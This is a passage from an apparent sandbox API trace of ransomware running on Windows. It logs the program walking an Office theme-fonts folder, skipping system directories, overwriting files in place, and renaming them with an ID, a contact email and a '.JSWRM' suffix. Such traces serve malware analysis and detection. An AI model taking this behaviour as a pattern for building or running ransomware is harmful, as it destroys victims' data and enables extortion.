Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Constantia-Franklin Gothic Book.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Constantia-Franklin Gothic Book.xml", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Constantia-Franklin Gothic Book.xml", lpUsedDefaultChar=0x0) returned 35 [0101.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0101.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0101.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Constantia-Franklin Gothic Book.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\constantia-franklin gothic book.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.117] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3574) returned 1 [0101.118] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdf0) returned 0x206858 [0101.118] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdf0, lpOverlapped=0x0) returned 1 [0101.119] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.119] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdf0, lpOverlapped=0x0) returned 1 [0101.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.120] CloseHandle (hObject=0x314) returned 1 [0101.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0101.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0101.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0101.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0101.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0101.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Constantia-Franklin Gothic Book.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\constantia-franklin gothic book.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Constantia-Franklin Gothic Book.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\constantia-franklin gothic book.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.121] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdbd, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Corbel.xml", cAlternateFileName="")) returned 1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2=".") returned 1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="..") returned 1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="...") returned 1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="windows") returned -1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="recovery") returned -1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="perflogs") returned -1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="documents and settings") returned -1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="system volume information") returned -1 [0101.121] lstrcmpiW (lpString1="Corbel.xml", lpString2="msocache") returned -1 [0101.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Corbel.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Corbel.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Corbel.xml", lpUsedDefaultChar=0x0) returned 10 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Corbel.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Corbel.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Corbel.xml", lpUsedDefaultChar=0x0) returned 10 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0101.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0101.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0101.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Corbel.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\corbel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.122] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3517) returned 1 [0101.122] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdb0) returned 0x206858 [0101.122] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdb0, lpOverlapped=0x0) returned 1 [0101.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.124] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdb0, lpOverlapped=0x0) returned 1 [0101.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.124] CloseHandle (hObject=0x314) returned 1 [0101.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0101.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0101.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0101.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0101.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0101.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0101.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Corbel.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\corbel.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Corbel.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\corbel.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0101.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0101.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0101.125] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde3, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Franklin Gothic.xml", cAlternateFileName="FRANKL~1.XML")) returned 1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2=".") returned 1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="..") returned 1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="...") returned 1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="windows") returned -1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="recovery") returned -1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="perflogs") returned -1 [0101.125] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="documents and settings") returned 1 [0101.126] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.126] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="system volume information") returned -1 [0101.126] lstrcmpiW (lpString1="Franklin Gothic.xml", lpString2="msocache") returned -1 [0101.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Franklin Gothic.xml", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0101.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Franklin Gothic.xml", cchWideChar=19, lpMultiByteStr=0x2413d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Franklin Gothic.xml", lpUsedDefaultChar=0x0) returned 19 [0101.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Franklin Gothic.xml", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0101.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Franklin Gothic.xml", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Franklin Gothic.xml", lpUsedDefaultChar=0x0) returned 19 [0101.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0101.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0101.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0101.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Franklin Gothic.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\franklin gothic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.126] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3555) returned 1 [0101.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde0) returned 0x206858 [0101.127] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xde0, lpOverlapped=0x0) returned 1 [0101.140] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.140] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xde0, lpOverlapped=0x0) returned 1 [0101.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.141] CloseHandle (hObject=0x314) returned 1 [0101.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0101.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0101.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0101.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0101.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.141] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Franklin Gothic.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\franklin gothic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Franklin Gothic.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\franklin gothic.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0101.142] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdd4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Garamond-TrebuchetMs.xml", cAlternateFileName="GARAMO~1.XML")) returned 1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2=".") returned 1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="..") returned 1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="...") returned 1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="windows") returned -1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="recovery") returned -1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="perflogs") returned -1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="documents and settings") returned 1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="system volume information") returned -1 [0101.142] lstrcmpiW (lpString1="Garamond-TrebuchetMs.xml", lpString2="msocache") returned -1 [0101.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond-TrebuchetMs.xml", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond-TrebuchetMs.xml", cchWideChar=24, lpMultiByteStr=0x240f70, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garamond-TrebuchetMs.xml", lpUsedDefaultChar=0x0) returned 24 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond-TrebuchetMs.xml", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0101.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garamond-TrebuchetMs.xml", cchWideChar=24, lpMultiByteStr=0x241308, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garamond-TrebuchetMs.xml", lpUsedDefaultChar=0x0) returned 24 [0101.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: 